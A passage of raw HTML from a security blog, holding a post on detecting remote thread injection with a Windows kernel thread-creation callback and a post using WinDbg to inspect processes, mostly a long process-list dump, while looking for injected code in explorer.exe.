remaining arguments are passed to the newly created process</pre><pre class="alt"><span class="kwrd">if</span> __name__ == <span class="str">"__main__"</span>:</pre><pre> import sys</pre><pre class="alt"> simple_debugger( sys.argv[1:] )</pre></div><br /><div class="csharpcode"> </div><br /><div class="csharpcode"> </div><br /><style type="text/css">.csharpcode, .csharpcode pre<br />{<br /> font-size: small;<br /> color: black;<br /> font-family: consolas, "Courier New", courier, monospace;<br /> background-color: #ffffff;<br /> /*white-space: pre;*/<br />}<br />.csharpcode pre { margin: 0em; }<br />.csharpcode .rem { color: #008000; }<br />.csharpcode .kwrd { color: #0000ff; }<br />.csharpcode .str { color: #006080; }<br />.csharpcode .op { color: #0000c0; }<br />.csharpcode .preproc { color: #cc6633; }<br />.csharpcode .asp { background-color: #ffff00; }<br />.csharpcode .html { color: #800000; }<br />.csharpcode .attr { color: #ff0000; }<br />.csharpcode .alt <br />{<br /> background-color: #f4f4f4;<br /> width: 100%;<br /> margin: 0em;<br />}<br />.csharpcode .lnum { color: #606060; }<br /></style> abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com3tag:blogger.com,1999:blog-9205939188428310956.post-13938768930928026312014-06-25T03:53:00.001-07:002014-06-25T04:02:11.255-07:00Monitoring Thread Injection<div dir="ltr" style="text-align: left;" trbidi="on">
A lot of malware inject threads into other process to bypass Security Products. <br />
Usually malwares write the the shellcode into remote process using WriteProcessMemory() and then start threads using CreateRemoteThread() . A lot of source codes are available over internet about this. <br />
Let’s see how we can monitor thread injection using kernel mode driver. A lot of AV products use this method. So I won’t get into much details. <br />
Windows has a API PsSetCreateThreadNotify that can be used by Kernel mode drivers. It provides a callback function that can be invoked whenever a thread is created. <br />
Please refer to MSDN for further details. <br />
It can be used as follows: <br />
PsSetCreateThreadNotifyRoutine(RemoteThreadDetect); //registers notification routine <br />
Now a part of RemoteThreadDetec reoutine: <br />
VOID RemoteThreadDetect (IN HANDLE RemotePid, IN HANDLE ThreadId, IN BOOLEAN flag) <br />
{ <br />
…………….. <br />
……….<br />
currproc = PsGetCurrentProcessId(); //gets current process ID <br />
………………. <br />
if (currproc != RemotePid)//check if current pid and pid passed in the function are same<br />
{<br />
DbgPrint("thread injection detected"<br />
} <br />
………… <br />
} <br />
CurrentProcessId() gets the ID of the current process in whose context thread creation is called. <br />
The logic is really simple. If the CurrProc and RemotePid are not same means the thread has been injected. <br />
I am not publishing the code as it’s too easy and similar codes can be found in internet <br />
<br />
<div class="wlWriterEditableSmartContent" id="scid:fb3a1972-4489-4e52-abe7-25a00bb07fdf:69be029d-7943-4b38-ba36-b63777433899" style="display: inline; float: none; margin: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI6DbRzKt-c1lDp8GXu6x39quR-WNS5SBpfxEfUyNNdDiXNfPurptdZJk-Pf4bQ7cIZFwbUPVoAS6IVWT3pVEJ6rOBnOy1xdA45W7DAAdofWx9CnIg7VqltuuwW3PweagLJT3P-PRI5RsA/s1600-h/image%25255B7%25255D.png"><img alt="image" border="0" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfJ4Js-A2adegsOvCTrzzF3zYU-DWUZ-ed7767LX0pmudR9LzUf-gnlLzSNGsjCsAFNfooSA1P8IWQ0fUSA61b9RC066IOtNd9ppejfLSJZ-4nsDqHkPsYsU2q44BNFZ-a_2YKPwo_o0mY//?imgmax=800" title="image" width="530" /></a></div>
<div class="wlWriterEditableSmartContent" id="scid:fb3a1972-4489-4e52-abe7-25a00bb07fdf:1673c496-7c43-49fa-aa19-30beec9c9cc4" style="display: inline; float: none; margin: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
<br /></div>
<br /></div>
<!-- Blogger automated replacement: "https://images-blogger-opensocial.googleusercontent.com/gadgets/proxy?url=http%3A%2F%2Flh4.ggpht.com%2F-_LJ-zqKkITk%2FUmgR6xyIX2I%2FAAAAAAAAAJw%2Fesdyo6l3DCQ%2Fimage_thumb%2525255B3%2525255D.png%3Fimgmax%3D800&container=blogger&gadget=a&rewriteMime=image%2F*" with "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfJ4Js-A2adegsOvCTrzzF3zYU-DWUZ-ed7767LX0pmudR9LzUf-gnlLzSNGsjCsAFNfooSA1P8IWQ0fUSA61b9RC066IOtNd9ppejfLSJZ-4nsDqHkPsYsU2q44BNFZ-a_2YKPwo_o0mY//?imgmax=800" -->abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com1tag:blogger.com,1999:blog-9205939188428310956.post-34060528531542391342012-04-17T03:02:00.001-07:002012-04-17T03:06:02.276-07:00Identifying malicious injected code in Legit Process through dynamic analysis:<p>I wont be diving into details how thread injection can be done as there is a lot of information on the internet about it.</p> <p>For locating malicious code injected in process I would be using Sysinternals VMMAP tool and windbg as remote debugger. </p> <p>I’ll show how to identify injected threads in explorer.exe </p> <p>Using windbg I find the details of process running in the system</p> <p>command:!process 0 0 </p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 536px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 157px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">kd> !process 0 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">**** NT ACTIVE PROCESS DUMP ****<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 829c6830 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 00319000 ObjectTable: e1000cc0 HandleCount: 475.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: System<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 82879170 SessionId: none Cid: 0238 Peb: 7ffd6000 ParentCid: 0004<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040020 ObjectTable: e1793dc0 HandleCount: 21.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: smss.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 822dc360 SessionId: 0 Cid: 0268 Peb: 7ffdf000 ParentCid: 0238<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040040 ObjectTable: e165c858 HandleCount: 395.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: csrss.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 827e1020 SessionId: 0 Cid: 0280 Peb: 7ffde000 ParentCid: 0238<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040060 ObjectTable: e1649b20 HandleCount: 564.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: winlogon.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 827e6020 SessionId: 0 Cid: 02ac Peb: 7ffda000 ParentCid: 0280<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040080 ObjectTable: e188d650 HandleCount: 270.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: services.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 824571c8 SessionId: 0 Cid: 02b8 Peb: 7ffdd000 ParentCid: 0280<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080400a0 ObjectTable: e1894188 HandleCount: 342.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: lsass.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 8254fca8 SessionId: 0 Cid: 036c Peb: 7ffd4000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080400c0 ObjectTable: e197a418 HandleCount: 24.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: vmacthlp.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 82453da0 SessionId: 0 Cid: 0378 Peb: 7ffd9000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080400e0 ObjectTable: e197e3d8 HandleCount: 189.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: svchost.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 823ef810 SessionId: 0 Cid: 03e8 Peb: 7ffdf000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040120 ObjectTable: e1cca130 HandleCount: 283.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: svchost.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 8245a7e8 SessionId: 0 Cid: 0448 Peb: 7ffde000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040140 ObjectTable: e1ccb818 HandleCount: 1520.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: svchost.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 8273b7e0 SessionId: 0 Cid: 0498 Peb: 7ffdd000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040160 ObjectTable: e17b3310 HandleCount: 79.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: svchost.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 8255d460 SessionId: 0 Cid: 0580 Peb: 7ffde000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080401a0 ObjectTable: e1898440 HandleCount: 210.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: svchost.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 827f9020 SessionId: 0 Cid: 0594 Peb: 7ffda000 ParentCid: 056c<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080401c0 ObjectTable: e1893ed8 HandleCount: 817.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 82452980 SessionId: 0 Cid: 0634 Peb: 7ffdf000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080401e0 ObjectTable: e1fb64f8 HandleCount: 134.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: spoolsv.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 823e8b88 SessionId: 0 Cid: 06dc Peb: 7ffd7000 ParentCid: 0594<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040100 ObjectTable: e1c3dfb8 HandleCount: 60.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: VMwareTray.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 82452020 SessionId: 0 Cid: 06f8 Peb: 7ffd9000 ParentCid: 0594<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040220 ObjectTable: e1909bb0 HandleCount: 200.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: VMwareUser.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 827f03c0 SessionId: 0 Cid: 0430 Peb: 7ffdb000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040180 ObjectTable: e1c66998 HandleCount: 260.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: vmtoolsd.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 82456830 SessionId: 0 Cid: 050c Peb: 7ffdf000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040280 ObjectTable: e1942f20 HandleCount: 97.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: VMUpgradeHelper.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 826b3da0 SessionId: 0 Cid: 00b0 Peb: 7ffdf000 ParentCid: 0448<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080402c0 ObjectTable: e2115538 HandleCount: 48.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: wscntfy.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 822b1b28 SessionId: 0 Cid: 0188 Peb: 7ffde000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080402e0 ObjectTable: e219e928 HandleCount: 105.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: alg.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 828e3460 SessionId: 0 Cid: 0160 Peb: 7ffd9000 ParentCid: 0448<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040320 ObjectTable: e21ec500 HandleCount: 146.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: wuauclt.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 828509f8 SessionId: 0 Cid: 0174 Peb: 7ffdc000 ParentCid: 0594<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080402a0 ObjectTable: 00000000 HandleCount: 0.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: md5.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 82161020 SessionId: 0 Cid: 0194 Peb: 7ffdc000 ParentCid: 0594<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040200 ObjectTable: e21bb870 HandleCount: 319.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: procexp.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 8217bda0 SessionId: 0 Cid: 0570 Peb: 7ffdf000 ParentCid: 0594<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040360 ObjectTable: e21a5520 HandleCount: 49.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: cmd.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 827f48b0 SessionId: 0 Cid: 07dc Peb: 7ffde000 ParentCid: 0594<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040380 ObjectTable: e27dabc0 HandleCount: 72.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: Filemon.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 821ba240 SessionId: 0 Cid: 0328 Peb: 7ffdf000 ParentCid: 0594<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040260 ObjectTable: e1fd9008 HandleCount: 49.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: cmd.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 82569668 SessionId: 0 Cid: 0400 Peb: 7ffda000 ParentCid: 01cc<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040420 ObjectTable: e27ea8a8 HandleCount: 51.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: notepad.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 821e9270 SessionId: 0 Cid: 0330 Peb: 7ffde000 ParentCid: 00d0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080403a0 ObjectTable: 00000000 HandleCount: 0.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: dikyufy.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 8215f4c8 SessionId: 0 Cid: 0728 Peb: 7ffde000 ParentCid: 0594<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080404a0 ObjectTable: e1254b88 HandleCount: 115.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: vmmap.exe</pre></pre><br /><p> For explorer.exe</p><br /><p>PROCESS 827f9020 SessionId: 0 Cid: 0594 Peb: 7ffda000 ParentCid: 056c<br> DirBase: 080401c0 ObjectTable: e1893ed8 HandleCount: 817.<br> Image: explorer.exe<br /><p>To see details of explorer.exe the following command can be executed:</p><br /><p> !process 827f9020 1f</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 547px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 237px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">kd> !process 827f9020 1f<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">PROCESS 827f9020 SessionId: 0 Cid: 0594 Peb: 7ffda000 ParentCid: 056c<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> DirBase: 080401c0 ObjectTable: e1893ed8 HandleCount: 840.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 97.72%; font-family: consolas,'Courier New',courier,monospace; height: 31px; background-color: #ffffff"> Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> VadRoot 828c6ed0 Vads 453 Clone 0 <span style="color: #0000ff">Private</span> 4113. Modified 300223. Locked 0.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Token e1f32940<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> ElapsedTime 79 Days 20:15:11.781<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:35.453<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:01:39.687<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> QuotaPoolUsage[PagedPool] 160060<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> QuotaPoolUsage[NonPagedPool] 52216<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Working <span style="color: #0000ff">Set</span> Sizes (<span style="color: #0000ff">now</span>,min,max) (3723, 50, 345) (14892KB, 200KB, 1380KB)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> PeakWorkingSetSize 11379<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> VirtualSize 96 Mb<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> PeakVirtualSize 126 Mb<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> PageFaultCount 156083<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> MemoryPriority BACKGROUND<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> BasePriority 8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> CommitCharge 5551<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> THREAD 823e83f0 Cid 0594.0598 Teb: 